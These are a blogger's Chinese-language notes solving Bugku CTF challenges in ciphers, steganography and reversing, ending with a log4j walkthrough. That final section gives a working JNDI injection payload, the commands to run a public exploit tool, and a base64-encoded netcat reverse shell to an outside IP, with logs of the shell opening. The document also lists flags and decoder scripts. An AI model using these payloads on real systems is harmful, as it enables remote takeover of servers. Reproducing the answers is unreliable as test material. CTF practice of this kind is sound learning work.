bugku随便玩玩

date

Dec 27, 2022 02:41 AM

Related to 日程数据 1 (blog)

抄错的字符

老师让小明抄写一段话，结果粗心的小明把部分数字抄成了字母，还因为强迫症把所有字母都换成大写。你能帮小明恢复并解开答案吗：QWIHBLGZZXJSXZNVBZW

而数字和字母相似的有 I(i)=>1、L(l)=>1、G(g)=>9、Z(z)=>2、S(s)=>5

/。-


..-./.-../.-/--./----.--/-../...--/..-./-.-./-.../..-./.----/--.../..-./----./...--/----./----./...../-----/....-/-----.-

嗯

不是培根

莫斯又多了


..-. .-.. .- --. ----.-- -.. ...-- ..-. -.-. -... ..-. .---- --... ..-. ----. ...-- ----. ----. ..... ----- ....- -----.-

聪明的小羊

一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0}

ok

file.txt

3.5KB

就三种貌似

毫无意义的题零实战

把猪困在猪圈里

file (1).txt

14.4KB

/9j/ 不是图片吗

实锤，保存文件

这又是啥

没了

telnet

networking.pcap

4.5KB

入门版de

眼见非实

眼见非实.docx

13.7KB

这都是啥

docx 本质就是压缩包

ping

ping.pcap

54.1KB

全是icmp

难道是找通的

想太多

sogo

怎么选出来各显神通吧

Linux2

没啥分离一下

这是个幌子

这么大的文件就一张图？？

strings brave |more

strings命令在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列，以换行符或空字符结束。 strings命令对识别随机对象文件很有用。

入门逆向

列模式正则

Easy_Re Reverse

re1.zip

48.1KB

根据题目关键字查找

游戏过关 Reverse

console.zip

247.5KB

换一个


# py -3
# coding:utf-8

array1 = [18,64,98,5,2,4,6,3,6,48,49,65,32,12,48,65,31,78,62,32,49,32,1,57,96,3,21,9,4,62,3,5,4,1,2,3,44,65,78,32,16,97,54,16,44,52,32,64,89,45,32,65,15,34,18,16,0]
array2 = [123,32,18,98,119,108,65,41,124,80,125,38,124,111,74,49,83,108,94,108,84,6,96,83,44,121,104,110,32,95,117,101,99,123,127,119,96,48,107,71,92,29,81,107,90,85,64,12,43,76,86,13,114,1,117,126,0]

flag = ''
for i in range(len(array1)):
    flag+= chr(array1[i] ^ array2[i] ^ 0x13 )
print (flag)

Easy_vb Reverse

file.zip

4.6KB

MCTF{N3t_Rev_1s_E4ay}

love

file.zip

11.9KB

简单注释


import base64
s ="e3nifIH9b_C@n@dH" 
flag =""
for i in range(len(s)):
    flag += chr(ord(s[i])- i)
flag = base64.b64decode(flag)
print(flag)

解密

马老师杀毒卫士

马老师杀毒卫士.zip

802.3KB


def enFence(string, space):
   s = ""
   for i in range(0, space):
       for j in range(i, len(string), space):
           # 不能越界
           if j < len(string):
               s += string[j]
   print(s)


def deFence(string, space):
   s = ""
   if len(string) % space == 0:
       key = len(string) // space
   else:
       key = len(string) // space + 1
   # 小于间隔继续
   for i in range(0, key):
       for j in range(i, len(string), key):
           # 不能越界
           if j < len(string):
               s += string[j]
   print(s)
deFence("fgaag_!l{_oun}amb_ob",3)

NoString

NoString.zip

48.7KB


s="oehnl3r=<?=hF@CCGPt"
f="yelhzl)`gy|})|)oehnl3"
flag=""
for i in s:
    flag= flag +chr(ord(i) ^ 9)
    print(chr(ord(i) ^ 9))
print(flag)

这是一张单纯的图片

有奇怪的代码

复制走

隐写


exiftool 2.png   
ExifTool Version Number         : 12.30
File Name                       : 2.png
Directory                       : .
File Size                       : 17 KiB
File Modification Date/Time     : 2017:06:07 22:26:44+08:00
File Access Date/Time           : 2021:12:12 18:02:12+08:00
File Inode Change Date/Time     : 2021:12:12 18:02:11+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 500
Image Height                    : 420
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Pixels Per Unit X               : 4724
Pixels Per Unit Y               : 4724
Pixel Units                     : meters
Profile Name                    : Photoshop ICC profile
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
White Point X                   : 0.31269
White Point Y                   : 0.32899
Red X                           : 0.63999
Red Y                           : 0.33001
Green X                         : 0.3
Green Y                         : 0.6
Blue X                          : 0.15
Blue Y                          : 0.05999
Image Size                      : 500x420
Megapixels                      : 0.210

Image Width : 500 Image Height : 420 Pixels Per Unit X : 4724 Pixels Per Unit Y : 4724

信息不对等

修改一下保存

赛博朋克

cyberpunk.txt

418.4KB

java环境有点问题

Stegsolve 显示不全

pass

贝斯手

贝斯手.zip

24.1KB


5+58==327a6c4304ad5938eaf0efb6cc3e53dcCFmZknmK3SDEcMEue1wrsJdqqkt7dXLuS

做题要细心-1

log4j


${jndi:ldap://cztlh5.dnslog.cn/exp}

存在漏洞


git clone https://github.com/black9/Log4shell_JNDIExploit.git
unzip log4j.zip

#进入目录
cd log4j/
java -jar *.jar -i 114.114.114.114 -p 8080
#开启nc监听12345端口
nc -lvn 12345

${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64加密后命令]}

还要安装环境


apt install default-jre

${jndi:ldap://102.223.75.148:1389/Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==}


➜  Log4shell_JNDIExploit git:(main) ✗ java -jar *.jar -i 102.223.75.148 -p 8080
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
[+] Paylaod: command
[+] Command: nc 102.223.75.148 12345 -e /bin/sh
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== redirecting to http://102.223.75.148:8080/ExploitWyWFTkcVxR.class
[+] New HTTP Request From /114.67.175.224:46900  /ExploitWyWFTkcVxR.class
[+] Receive ClassRequest: ExploitWyWFTkcVxR.class
[+] Response Code: 200
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==


➜  ~ nc -lvnp 12345
listening on [any] 12345 ...
connect to [102.223.75.148] from (UNKNOWN) [114.67.175.224] 42381



ls
bin
dev
etc
flag
home
lib
linuxrc
media
mnt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
cat flag
flag{60f59ffe0f15aad3d9e544fbef142349}